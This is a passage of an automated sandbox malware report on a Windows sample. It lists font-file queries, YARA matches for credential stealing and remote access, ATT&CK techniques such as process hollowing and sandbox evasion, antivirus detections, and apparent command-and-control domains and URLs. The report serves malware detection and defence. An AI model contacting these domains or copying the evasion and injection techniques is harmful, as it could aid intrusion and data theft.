Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

Source: Yara match | File source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Techniques matched by signatures in this analysis, with the count badge as extracted:

Execution: Command and Scripting Interpreter (2); Shared Modules (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (512); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (151); Process Injection (512); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (2); Timestomp (1); DLL Side-Loading (1)
Discovery: Security Software Discovery (341); Process Discovery (2); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (212)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12)

No techniques were matched under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Behavior Graph (ID 1587624; sample TU0kiz3mxz.exe; start date 10/01/2025; architecture WINDOWS; score 100). Content recovered from the graph:

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures.
Network nodes: www.cleans.xyz (Performs DNS queries to domains with low reputation); www.yeloma-treatment-82106.bond; 10 other IPs or domains.

Process tree:
  TU0kiz3mxz.exe (dropped C:\Users\user\AppData\...\TU0kiz3mxz.exe.log, ASCII; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces)
    TU0kiz3mxz.exe (Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures)
      explorer.exe, injected (connects to www.cleans.xyz 13.248.169.48, ports 49868 and 80, AMAZON-02US, United States; System process connects to network (likely due to code injection or exploit))
        explorer.exe (Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces)
          cmd.exe
            conhost.exe
        WerFault.exe
    TU0kiz3mxz.exe
  explorer.exe (Query firmware table information (likely to detect VMs))

Antivirus detection for the submitted sample (Source: Detection, Scanner, Label):
  TU0kiz3mxz.exe: 77%, Virustotal
  TU0kiz3mxz.exe: 91%, ReversingLabs, ByteCode-MSIL.Trojan.Jalapeno
  TU0kiz3mxz.exe: 100%, Avira, TR/AD.Swotter.ooigd
  TU0kiz3mxz.exe: 100%, Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Contacted URL (Name: Malicious, Antivirus Detection, Reputation):
  www.ehills.shop/m25s/: malicious true; Avira URL Cloud: safe; reputation unknown
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.uykoii.shopexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://schemas.microexplorer.exe, 00000004.00000002.2632617242.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2634903958.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.2632406238.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.ildcraft.xyz/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.cleans.xyzReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.pringhillinfos.netReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.typography.netDTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.ental-health-69511.bondReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
